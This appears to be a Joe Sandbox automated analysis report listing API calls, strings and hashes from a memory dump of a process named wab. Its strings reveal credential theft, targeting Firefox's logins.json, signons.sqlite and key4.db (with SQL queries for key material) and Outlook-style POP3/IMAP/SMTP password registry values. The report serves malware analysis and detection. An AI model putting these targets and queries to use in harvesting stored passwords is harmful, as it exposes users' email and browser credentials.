                                                                                            • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                            • API String ID: 2238633743-192783356
                                                                                            • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                            • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                            • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                            • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                            • API String ID: 3963849919-1658304561
                                                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                            • String ID: (yE$(yE$(yE
                                                                                            • API String ID: 1865533344-362086290
                                                                                            • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                            • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                            • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                            • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                              • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                              • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                              • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                            • memset.MSVCRT ref: 0040E5B8
                                                                                            • memset.MSVCRT ref: 0040E5CD
                                                                                            • _mbscpy.MSVCRT ref: 0040E634
                                                                                            • _mbscpy.MSVCRT ref: 0040E64A
                                                                                            • _mbscpy.MSVCRT ref: 0040E660
                                                                                            • _mbscpy.MSVCRT ref: 0040E676
                                                                                            • _mbscpy.MSVCRT ref: 0040E68C
                                                                                            • _mbscpy.MSVCRT ref: 0040E69F
                                                                                            • memset.MSVCRT ref: 0040E6B5
                                                                                            • memset.MSVCRT ref: 0040E6CC
                                                                                              • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                              • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                            • memset.MSVCRT ref: 0040E736
                                                                                            • memset.MSVCRT ref: 0040E74F
                                                                                            • sprintf.MSVCRT ref: 0040E76D
                                                                                            • sprintf.MSVCRT ref: 0040E788
                                                                                            • _strcmpi.MSVCRT ref: 0040E79E
                                                                                            • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                            • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                            • memset.MSVCRT ref: 0040E858
                                                                                            • sprintf.MSVCRT ref: 0040E873
                                                                                            • _strcmpi.MSVCRT ref: 0040E889
                                                                                            • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                            • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                            • API String ID: 4171719235-3943159138
                                                                                            • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                            • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                            • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                            • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                            • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                            • GetDC.USER32 ref: 004104E2
                                                                                            • strlen.MSVCRT ref: 00410522
                                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                            • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                            • sprintf.MSVCRT ref: 00410640
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                            • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                            • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                            • GetClientRect.USER32(?,?), ref: 00410737
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                            • API String ID: 1703216249-3046471546
                                                                                            • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                            • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                            • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                            • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004024F5
                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                            • _mbscpy.MSVCRT ref: 00402533
                                                                                            • _mbscpy.MSVCRT ref: 004025FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$QueryValuememset
                                                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                            • API String ID: 168965057-606283353
                                                                                            • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                            • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                            • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                            • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00402869
                                                                                              • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                            • _mbscpy.MSVCRT ref: 004028A3
                                                                                              • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                            • _mbscpy.MSVCRT ref: 0040297B
                                                                                              • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                            • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                            • API String ID: 1497257669-167382505
                                                                                            • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                            • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                            • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                            • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                            • memset.MSVCRT ref: 0040128E
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                            • String ID:
                                                                                            • API String ID: 2998058495-0
                                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                            • API String ID: 231171946-2189169393
                                                                                            • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                            • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                            • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                            • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                            • API String ID: 633282248-1996832678
                                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • key4.db, xrefs: 00406756
                                                                                            • , xrefs: 00406834
                                                                                            • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                            • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp$memsetstrlen
                                                                                            • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                            • API String ID: 3614188050-3983245814
                                                                                            • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                            • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                            • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                            • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: sprintf$memset$_mbscpy
                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                            • API String ID: 3402215030-3842416460
                                                                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                              • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                            • strlen.MSVCRT ref: 0040F139
                                                                                            • strlen.MSVCRT ref: 0040F147
                                                                                            • memset.MSVCRT ref: 0040F187
                                                                                            • strlen.MSVCRT ref: 0040F196
                                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                                            • strlen.MSVCRT ref: 0040F207
                                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                            • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                            • _mbscpy.MSVCRT ref: 0040F30E
                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                            • API String ID: 1613542760-3138536805
                                                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                            • API String ID: 1012775001-1343505058
                                                                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00444612
                                                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                            • strlen.MSVCRT ref: 0044462E
                                                                                            • memset.MSVCRT ref: 00444668
                                                                                            • memset.MSVCRT ref: 0044467C
                                                                                            • memset.MSVCRT ref: 00444690
                                                                                            • memset.MSVCRT ref: 004446B6
                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                            • memcpy.MSVCRT ref: 004446ED
                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                            • memcpy.MSVCRT ref: 00444729
                                                                                            • memcpy.MSVCRT ref: 0044473B
                                                                                            • _mbscpy.MSVCRT ref: 00444812
                                                                                            • memcpy.MSVCRT ref: 00444843
                                                                                            • memcpy.MSVCRT ref: 00444855
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset$strlen$_mbscpy
                                                                                            • String ID: salu
                                                                                            • API String ID: 3691931180-4177317985
